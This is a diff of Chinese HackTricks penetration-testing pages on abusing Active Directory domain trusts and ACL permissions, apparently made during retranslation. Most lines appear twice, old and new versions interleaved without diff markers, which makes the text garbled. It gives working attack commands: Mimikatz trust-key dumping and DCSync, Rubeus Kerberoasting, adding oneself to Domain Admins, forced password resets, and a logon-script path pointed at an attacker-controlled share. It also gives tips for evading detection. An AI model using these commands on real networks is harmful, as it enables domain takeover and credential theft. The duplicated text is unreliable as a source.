3. 客户端然后向 DC1 请求一个**跨领域 TGT**,该 TGT 是访问**域 2**中的资源所需的。
4. 领域 TGT 使用作为双向域信任的一部分在 DC1 和 DC2 之间共享的**信任密钥**进行加密。
5. 客户端将跨领域 TGT 带到**域 2 的域控制器DC2**。
6. DC2 使用其共享的信任密钥验证跨领域 TGT如果有效则为客户端想要访问的域 2 中的服务器发出**票据授予服务TGS**。
7. 最后,客户端将此 TGS 提交给服务器,该 TGS 使用服务器的账户哈希进行加密,以获取对域 2 中服务的访问权限。
### 不同的信任
重要的是要注意**信任可以是单向或双向**。在双向选项中,两个域将相互信任,但在**单向**信任关系中,其中一个域将是**受信任**域,另一个是**信任**域。在最后一种情况下,**您只能从受信任域访问信任域内的资源**。
重要的是要注意**信任可以是单向或双向**。在双向选项中,两个域将相互信任,但在**单向**信任关系中,一个域将是**受信任**的,另一个是**信任**的。在最后一种情况下,**你只能从受信任的域访问信任域内的资源**。
如果域 A 信任域 BA 是信任域B 是受信任域。此外,在**域 A** 中,这将是**出站信任**;在**域 B** 中,这将是**入站信任**。
如果域 A 信任域 BA 是信任域B 是受信任域。此外,在**域 A**中,这将是**出站信任**在**域 B**中,这将是**入站信任**。
**不同的信任关系**
* **父子信任**:这是同一森林中常见的设置,其中子域自动与其父域建立双向传递信任。基本上,这意味着认证
* **父子信任**:这是同一森林内的常见设置,子域自动与其父域建立双向传递信任。这意味着身份验证请求可以在父域和子域之间无缝流动。
* **交叉链接信任**:被称为“快捷信任”,这些信任在子域之间建立,以加快引用过程。在复杂的森林中,身份验证引用通常必须向森林根节点上行,然后再向目标域下行。通过创建交叉链接,旅程缩短,这在地理分散的环境中特别有利。
* **外部信任**:这些信任在不同的、不相关的域之间建立,通常是非传递的。根据[微软的文档](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx),外部信任对于访问当前森林外的域中的资源非常有用,该域未通过森林信任连接。通过 SID 过滤增强安全性。
* **树根信任**:这些信任在森林根域和新添加的树根之间自动建立。虽然不常见,但树根信任对于将新域树添加到森林中非常重要,使它们能够保持唯一的域名并确保双向传递性。有关更多信息,请参见[微软的指南](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)。
* **森林信任**:这种类型的信任是两个森林根域之间的双向传递信任,也强制执行 SID 过滤以增强安全措施。
* **MIT 信任**:这些信任与非 Windows 的[RFC4120 兼容](https://tools.ietf.org/html/rfc4120) Kerberos 域建立。MIT 信任更为专业,适用于需要与 Windows 生态系统外的基于 Kerberos 的系统集成的环境。
#### **信任关系中的其他差异**
* 信任关系也可以是**传递的**A 信任 BB 信任 C则 A 信任 C或**非传递的**。
* 信任关系可以设置为**双向信任**(双方相互信任)或**单向信任**(只有一个信任另一个)。
### 攻击路径
1. **枚举**信任关系
2. 检查是否有任何**安全主体**(用户/组/计算机)对**另一个域**的资源有**访问**权限,可能通过 ACE 条目或在另一个域的组中。寻找**跨域关系**(信任可能是为此创建的)。
3. 在这种情况下kerberoast 可能是另一个选项。
4. **妥协**可以**跨域**的**账户**
攻击者可以通过三种主要机制访问另一个域中的资源:
* **本地组成员资格**:主体可能被添加到机器上的本地组中,例如服务器上的“管理员”组,从而授予他们对该机器的重大控制。
* **外部域组成员资格**:主体也可以是外部域中组的成员。然而,这种方法的有效性取决于信任的性质和组的范围。
* **访问控制列表ACLs**:主体可能在**ACL**中被指定,特别是在**DACL**中的**ACE**内,提供对特定资源的访问权限。对于那些希望深入了解 ACL、DACL 和 ACE 机制的人,名为“[An ACE Up The Sleeve](https://specterops.io/assets/resources/an\_ace\_up\_the\_sleeve.pdf)”的白皮书是一个宝贵的资源。
### 子到父森林权限提升
```
Get-DomainTrust
@ -561,55 +576,52 @@ TrustDirection : Bidirectional --> Trust direction (2ways in this case)
WhenCreated : 2/19/2021 1:28:00 PM
WhenChanged : 2/19/2021 1:28:00 PM
```
{% hint style="warning" %}
有**2个受信任的密钥**,一个用于 _Child --> Parent_,另一个用于 _Parent_ --> _Child_。\
您可以使用以下命令查看当前域使用的密钥:
**2 个受信任的密钥**,一个用于 _Child --> Parent_,另一个用于 _Parent_ --> _Child_.\
您可以使用当前域使用的密钥:
```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
```
{% endhint %}
#### SID-History Injection
#### SID-History 注入
利用SID-History注入来升级为企业管理员滥用与SID-History注入相关的子/父域之间的信任
通过利用与 SID-History 注入的信任关系,提升为企业管理员到子域/父域
{% content-ref url="sid-history-injection.md" %}
[sid-history-injection.md](sid-history-injection.md)
{% endcontent-ref %}
#### 利用可写配置NC
#### 利用可写配置 NC
了解如何利用配置命名上下文NC是至关重要的。配置NC在Active DirectoryAD环境中充当跨森林的配置数据的中央存储库。这些数据会被复制到森林中的每个域控制器DC可写DC会维护配置NC的可写副本。要利用这一点必须在DC上具有**SYSTEM特权**,最好是子DC。
理解如何利用配置命名上下文 (NC) 是至关重要的。配置 NC 作为 Active Directory (AD) 环境中跨森林的配置数据的中央存储库。这些数据会复制到森林内的每个域控制器 (DC),可写的 DC 维护配置 NC 的可写副本。要利用这一点,必须在 DC 上拥有 **SYSTEM 权限**,最好是子 DC。
**将GPO链接到根DC站点**
**将 GPO 链接到根 DC 站点**
配置NC的站点容器包含有关AD森林中所有域加入计算机站点的信息。通过在任何DC上以SYSTEM特权运行攻击者可以将GPO链接到根DC站点。这一操作可能通过操纵应用于这些站点的策略来危害根域。
配置 NC 的站点容器包含有关 AD 森林中所有域加入计算机的站点的信息。通过在任何 DC 上以 SYSTEM 权限操作,攻击者可以将 GPO 链接到根 DC 站点。此操作可能通过操纵应用于这些站点的策略来危害根域。
要深入了解信息,可以研究有关[绕过SID过滤](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research)的研究。
有关深入信息,可以探索关于 [绕过 SID 过滤](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research) 的研究。
**危害森林中的任何gMSA**
**危害森林中的任何 gMSA**
种攻击向量涉及针对域内特权gMSA。KDS根密钥用于计算gMSA密码存储在配置NC中。通过在任何DC上具有SYSTEM特权可以访问KDS根密钥并计算森林中任何gMSA的密码。
个攻击向量涉及针对域内特权 gMSA。KDS 根密钥是计算 gMSA 密码所必需的,存储在配置 NC 中。通过在任何 DC 上拥有 SYSTEM 权限,可以访问 KDS 根密钥并计算森林中任何 gMSA 的密码。
有关详细分析,请参阅[Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)中的讨论
详细分析可以在关于 [黄金 gMSA 信任攻击](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent) 的讨论中找到
**模式更改攻击**
**架构变更攻击**
此方法需要耐心等待新特权AD对象的创建。具有SYSTEM特权的攻击者可以修改AD模式以授予任何用户对所有类的完全控制。这可能导致对新创建的AD对象的未经授权访问和控制。
此方法需要耐心,等待新特权 AD 对象的创建。拥有 SYSTEM 权限的攻击者可以修改 AD 架构,以授予任何用户对所有类的完全控制。这可能导致对新创建的 AD 对象的未经授权访问和控制。
可在[Schema Change Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)中找到更多阅读材料
进一步阅读可在 [架构变更信任攻击](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent) 中找到。
**从DA到EA使用ADCS ESC5**
**从 DA 到 EA 的 ADCS ESC5**
ADCS ESC5漏洞旨在控制公钥基础设施PKI对象以创建一个证书模板使得可以作为森林中的任何用户进行身份验证。由于PKI对象驻留在配置NC中因此攻击者可以通过妥善利用可写子DC来执行ESC5攻击
ADCS ESC5 漏洞针对对公钥基础设施 (PKI) 对象的控制,以创建一个证书模板,使其能够作为森林中的任何用户进行身份验证。由于 PKI 对象位于配置 NC 中,危害可写的子 DC 使得执行 ESC5 攻击成为可能
有关更多详细信息,请阅读[From DA to EA with ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)。在缺乏ADCS的情况下攻击者有能力设置必要的组件如[从子域管理员升级为企业管理员](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/)中所讨论的。
### 外部森林域 - 单向(入站)或双向
有关此内容的更多细节可以在 [从 DA 到 EA 的 ESC5](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c) 中阅读。在缺乏 ADCS 的情况下,攻击者有能力设置必要的组件,如 [从子域管理员提升到企业管理员](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/) 中所讨论的。
### 外部森林域 - 单向 (入站) 或双向
```powershell
Get-DomainTrust
SourceName : a.domain.local --> Current domain
@ -620,15 +632,13 @@ TrustDirection : Inbound --> Inboud trust
WhenCreated : 2/19/2021 10:50:56 PM
WhenChanged : 2/19/2021 10:50:56 PM
```
在这种情况下,**您的域受到外部域的信任**,使您对其拥有**未确定的权限**。您需要找出**您的域的哪些主体对外部域具有哪些访问权限**,然后尝试利用它:
在这种情况下,**您的域受到外部域的信任**,这使您对其拥有**不确定的权限**。您需要找出**您的域中的哪些主体对外部域具有哪些访问权限**,然后尝试利用它:
{% content-ref url="external-forest-domain-oneway-inbound.md" %}
[external-forest-domain-oneway-inbound.md](external-forest-domain-oneway-inbound.md)
{% endcontent-ref %}
### 外部森林域 - 单向(出站)
```powershell
Get-DomainTrust -Domain current.local
@ -640,19 +650,18 @@ TrustDirection : Outbound --> Outbound trust
WhenCreated : 2/19/2021 10:15:24 PM
WhenChanged : 2/19/2021 10:15:24 PM
```
在这种情况下,**您的域**正在**信任**来自**不同域**的主体的一些**权限**。
在这种情况下,**您的域**正在向来自**不同域**的主体授予一些**特权**。
然而,当受信任的域信任信任域时,受信任的域会创建一个使用**受信任密码**作为密码的**可预测名称**的用户。这意味着可以**访问信任域中的用户**以进入受信任域进行枚举并尝试提升更多特权:
然而,当一个**域被信任**时,受信任的域**创建一个用户**,其**名称是可预测的**,并使用**受信任的密码**作为**密码**。这意味着可以**访问来自信任域的用户以进入受信任域**,以枚举它并尝试提升更多权限:
{% content-ref url="external-forest-domain-one-way-outbound.md" %}
[external-forest-domain-one-way-outbound.md](external-forest-domain-one-way-outbound.md)
{% endcontent-ref %}
另一种妥协受信任域的方法是找在域信任的**相反方向**创建的[**SQL受信任链接**](abusing-ad-mssql.md#mssql-trusted-links)(这并不常见)。
另一种妥协受信任域的方法是找在域信任的**相反方向**创建的[**SQL受信任链接**](abusing-ad-mssql.md#mssql-trusted-links)(这并不常见)。
另一种妥协受信任域的方法是等待在受信任域用户可以访问的计算机上登录,然后通过**RDP**登录。然后攻击者可以在RDP会话过程中注入代码并从那里**访问受害者的原始域**。\
此外,如果**受害者挂载了他的硬盘**,攻击者可以在**硬盘的启动文件夹**中存储**后门**。这种技术称为**RDPInception**。
另一种妥协受信任域的方法是在一台**受信任域用户可以访问的**机器上等待,通过**RDP**登录。然后攻击者可以在RDP会话进程中注入代码并从那里**访问受害者的源域**。\
此外,如果**受害者挂载了他的硬盘**,攻击者可以在**RDP会话**进程中将**后门**存储在**硬盘的启动文件夹**中。这种技术称为**RDPInception**。
{% content-ref url="rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](rdp-sessions-abuse.md)
@ -660,15 +669,15 @@ WhenChanged : 2/19/2021 10:15:24 PM
### 域信任滥用缓解
### **SID 过滤:**
### **SID过滤:**
* 通过SID过滤来减轻跨森林信任中利用SID历史属性的攻击风险SID过滤在所有森林信任上默认激活。这是基于一个假设即考虑到森林而不是域将森林视为安全边界符合微软的立场。
* 然而有一个问题SID过滤可能会干扰应用程序和用户访问导致偶尔禁用。
* 通过SID过滤来减轻利用SID历史属性进行攻击的风险SID过滤在所有跨森林信任中默认启用。这是基于假设考虑到森林而不是域作为安全边界认为内部森林信任是安全的这是微软的立场。
* 然而有一个问题SID过滤可能会干扰应用程序和用户访问导致偶尔禁用。
### **选择性身份验证:**
### **选择性身份验证**
* 对于森林间的信任,使用选择性身份验证确保来自两个森林的用户不会自动验证。相反,需要为用户访问信任域或森林内的域和服务器授予明确权限
* 需要注意的是,这些措施并不能防止对可写配置命名上下文NC的利用或对信任帐户的攻击。
* 对于跨森林信任,采用选择性身份验证确保两个森林的用户不会自动进行身份验证。相反,用户需要明确的权限才能访问信任域或森林中的域和服务器
* 重要的是要注意,这些措施并不能保护免受可写配置命名上下文NC的利用或对信任帐户的攻击。
[**有关域信任的更多信息请访问ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
@ -676,50 +685,51 @@ WhenChanged : 2/19/2021 10:15:24 PM
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %}
## 一些常规防御措施
## 一些一般防御
[**了解如何保护凭据的更多信息。**](../stealing-credentials/credentials-protections.md)\\
[**在这里了解更多关于如何保护凭据的信息。**](../stealing-credentials/credentials-protections.md)\\
### **保护凭据的防御措施**
### **凭据保护的防御措施**
* **域管理员限制**: 建议只允许域管理员登录域控制器,避免在其他主机上使用他们
* **服务帐户特权**: 服务不应以域管理员DA特权运行以保持安全性
* **临时特权限制**: 对于需要DA特权的任务其持续时间应受限制。可以通过以下方式实现:`Add-ADGroupMember -Identity Domain Admins -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
* **域管理员限制**:建议仅允许域管理员登录到域控制器,避免在其他主机上使用
* **服务帐户权限**服务不应以域管理员DA权限运行以保持安全
* **临时权限限制**对于需要DA权限的任务应限制其持续时间。这可以通过以下方式实现:`Add-ADGroupMember -Identity Domain Admins -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
### **实施欺骗技术**
* 实施欺骗技术涉及设置陷阱,如虚假用户或计算机,具有诸如不过期或标记为可委派的密码等功能。详细方法包括创建具有特定权限的用户或将其添加到高权组
* 实施欺骗涉及设置陷阱,如诱饵用户或计算机,具有如密码不过期或标记为受信任的委托等特征。详细的方法包括创建具有特定权限的用户或将其添加到高权组。
* 一个实际的例子涉及使用工具:`Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
* 有关部署欺骗技术的更多信息,请访问[GitHub上的Deploy-Deception](https://github.com/samratashok/Deploy-Deception)。
* 有关部署欺骗技术的更多信息,请访问[Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception)。
### **识别欺骗**
* **对于用户对象**: 可疑指标包括非典型的ObjectSID、不经常的登录、创建日期和低错误密码计数。
* **一般指标**: 将潜在的虚假对象的属性与真实对象的属性进行比较,可以揭示不一致之处。像[HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)这样的工具可以帮助识别这种欺骗。
* **对于用户对象**可疑指标包括不典型的ObjectSID、频率较低的登录、创建日期和低错误密码计数。
* **一般指标**:比较潜在诱饵对象的属性与真实对象的属性可以揭示不一致性。像[HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster)这样的工具可以帮助识别这种欺骗。
### **绕过检测系统**
* **Microsoft ATA检测绕过**:
* **用户枚举**: 避免在域控制器上进行会话枚举以防止ATA检测。
* **票据冒充**: 利用**aes**密钥进行票据创建有助于通过不降级为NTLM来避免检测
* **DCSync攻击**: 建议从非域控制器执行以避免ATA检测因为直接从域控制器执行会触发警报。
* **Microsoft ATA检测绕过**
* **用户枚举**:避免在域控制器上进行会话枚举,以防止ATA检测。
* **票据冒充**:利用**aes**密钥创建票据有助于避免检测因为不降级到NTLM
* **DCSync攻击**建议从非域控制器执行以避免ATA检测因为直接从域控制器执行将触发警报。
## 参考资料
## 参考文献
* [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
* [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html)
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord小组**](https://discord.gg/hRep4RUj7f)或[**电报小组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,41 +1,42 @@
# 滥用Active Directory ACLs/ACEs
# 滥用 Active Directory ACLs/ACEs
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**本页主要总结了来自** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **和** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)** 的技术。有关更多详细信息,请查看原始文章。**
**本页主要总结了来自** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **和** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**的技术总结。有关更多详细信息,请查看原始文章。**
## **用户的GenericAll权限**
## **用户的 GenericAll 权限**
此权限授予攻击者对目标用户帐户的完全控制。一旦使用`Get-ObjectAcl`命令确认了`GenericAll`权限,攻击者可以:
此权限授予攻击者对目标用户帐户的完全控制。一旦使用 `Get-ObjectAcl` 命令确认了 `GenericAll` 权限,攻击者可以:
* **更改目标的密码**:使用`net user <username> <password> /domain`,攻击者可以重置用户的密码。
* **有针对性的Kerberoasting**将SPN分配给用户帐户以使其成为kerberoastable然后使用Rubeus和targetedKerberoast.py提取并尝试破解票据授予票据TGT哈希。
* **更改目标的密码**:使用 `net user <username> <password> /domain`,攻击者可以重置用户的密码。
* **针对性 Kerberoasting**:将 SPN 分配给用户帐户,使其可进行 Kerberoasting然后使用 Rubeus 和 targetedKerberoast.py 提取并尝试破解票据授予票 (TGT) 哈希。
```powershell
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
```
* **目标化ASREPRoasting**: 禁用用户的预身份验证使其帐户容易受到ASREPRoasting攻击。
* **Targeted ASREPRoasting**: 禁用用户的预身份验证,使其账户容易受到 ASREPRoasting 攻击。
```powershell
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
## **GenericAll Rights on Group**
## **GenericAll 权限在组上**
此权限允许攻击者在拥有`GenericAll`权限的组(如`Domain Admins`)上操纵组成员。在使用`Get-NetGroup`识别组的专有名称后,攻击者可以:
此权限允许攻击者操纵组成员资格,如果他们在像 `Domain Admins` 这样的组上拥有 `GenericAll` 权限。在使用 `Get-NetGroup` 确定组的区分名称后,攻击者可以:
- **将自己添加到Domain Admins组**可以通过直接命令或使用Active Directory或PowerSploit等模块来完成。
* **将自己添加到 Domain Admins 组**:这可以通过直接命令或使用像 Active Directory 或 PowerSploit 这样的模块来完成。
```powershell
net group "domain admins" spotless /add /domain
Add-ADGroupMember -Identity "domain admins" -Members spotless
@ -43,35 +44,35 @@ Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.
```
## **GenericAll / GenericWrite / Write on Computer/User**
拥有计算机对象或用户帐户上的这些权限允许:
持有这些权限在计算机对象或用户帐户上允许:
* **Kerberos基于资源的受限委派**:启用接管计算机对象。
* **影子凭据**:利用特权创建影子凭据来冒充计算机或用户帐户。
* **Kerberos 基于资源的受限委派**:允许接管计算机对象。
* **影子凭证**:使用此技术通过利用创建影子凭证的权限来冒充计算机或用户帐户。
## **WriteProperty on Group**
如果用户对特定组(例如`Domain Admins`)的所有对象具有`WriteProperty`权限,他们可以:
如果用户对特定组(例如`Domain Admins`)的所有对象具有 `WriteProperty` 权限,他们可以:
* **将自己添加到Domain Admins组**:通过结合`net user`和`Add-NetGroupUser`命令,可以实现此方法,从而在域内提升特权
* **将自己添加到 Domain Admins 组**:通过结合使用 `net user``Add-NetGroupUser` 命令实现,此方法允许在域内提升权限
```powershell
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **组中的自身(自我成员资格)**
## **自我(自我成员)在组中**
此权限使攻击者能够通过直接操组成员资格的命令将自己添加到特定组,例如`Domain Admins`。使用以下命令序列可以实现自我添加:
此权限使攻击者能够通过直接操组成员资格的命令将自己添加到特定组,例如 `Domain Admins`。使用以下命令序列可以实现自我添加:
```powershell
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **WriteProperty(自我成员资格)**
## **WriteProperty (自我成员资格)**
类似的权限,允许攻击者通过修改组属性直接将自己添加到组中,前提是他们对这些组具有`WriteProperty`权限。此权限的确认和执行如下进行:
一个类似的权限,允许攻击者通过修改组属性直接将自己添加到组中,如果他们在这些组上拥有 `WriteProperty` 权限。此权限的确认和执行通过以下方式进行:
```powershell
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
net group "domain admins" spotless /add /domain
```
## **ForceChangePassword**
在用户上持有`ExtendedRight`的`User-Force-Change-Password`权限允许在不知道当前密码的情况下重置密码。可以通过PowerShell或替代命令行工具验证此权限并利用它提供了几种重置用户密码的方法包括交互式会话和非交互式环境的一行命令。这些命令从简单的PowerShell调用到在Linux上使用`rpcclient`,展示了攻击向量的多样性。
持有用户的 `User-Force-Change-Password``ExtendedRight` 允许在不知道当前密码的情况下重置密码。可以通过 PowerShell 或其他命令行工具验证此权限及其利用,提供多种重置用户密码的方法,包括交互式会话和非交互式环境中的单行命令。这些命令从简单的 PowerShell 调用到在 Linux 上使用 `rpcclient`,展示了攻击向量的多样性。
```powershell
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainUserPassword -Identity delegate -Verbose
@ -82,23 +83,23 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
```
## **在组上使用WriteOwner**
## **WriteOwner 权限在组上**
如果攻击者发现他们对一个组拥有`WriteOwner`权限,他们可以将该组的所有权更改为自己。当涉及的组是`Domain Admins`时,这将产生重大影响,因为更改所有权允许对组属性和成员资格进行更广泛的控制。该过程涉及通过`Get-ObjectAcl`识别正确的对象,然后使用`Set-DomainObjectOwner`通过SID或名称修改所有者
如果攻击者发现他们对一个组拥有 `WriteOwner` 权限,他们可以将该组的所有权更改为自己。这在该组是 `Domain Admins` 时尤其具有影响力,因为更改所有权允许对组属性和成员资格进行更广泛的控制。该过程涉及通过 `Get-ObjectAcl` 确定正确的对象,然后使用 `Set-DomainObjectOwner` 修改所有者,可以通过 SID 或名称进行修改
```powershell
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
```
## **用户上的GenericWrite**
## **GenericWrite on User**
此权限允许攻击者修改用户属性。具体来说,通过`GenericWrite`访问权限,攻击者可以更改用户的登录脚本路径,以便在用户登录时执行恶意脚本。这可以通过使用`Set-ADObject`命令来更新目标用户的`scriptpath`属性,使其指向攻击者的脚本来实现
此权限允许攻击者修改用户属性。具体而言,拥有 `GenericWrite` 访问权限的攻击者可以更改用户的登录脚本路径,以便在用户登录时执行恶意脚本。这是通过使用 `Set-ADObject` 命令更新目标用户的 `scriptpath` 属性,使其指向攻击者的脚本来实现的
```powershell
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
```
## **组上的GenericWrite权限**
## **GenericWrite on Group**
具有此权限的攻击者可以操纵组成员资格例如将自己或其他用户添加到特定组中。该过程涉及创建凭据对象使用它向组中添加或移除用户并使用PowerShell命令验证成员资格更改。
通过此权限,攻击者可以操纵组成员资格,例如将自己或其他用户添加到特定组中。此过程涉及创建凭据对象,使用它来添加或移除用户,并使用 PowerShell 命令验证成员资格更改。
```powershell
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
@ -108,7 +109,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
```
## **WriteDACL + WriteOwner**
拥有AD对象并具有对其的`WriteDACL`权限使攻击者能够授予自己对该对象的`GenericAll`权限。这是通过ADSI操作实现的允许完全控制对象并能够修改其组成员资格。尽管如此在尝试使用Active Directory模块的`Set-Acl` / `Get-Acl`命令时,存在一些限制。
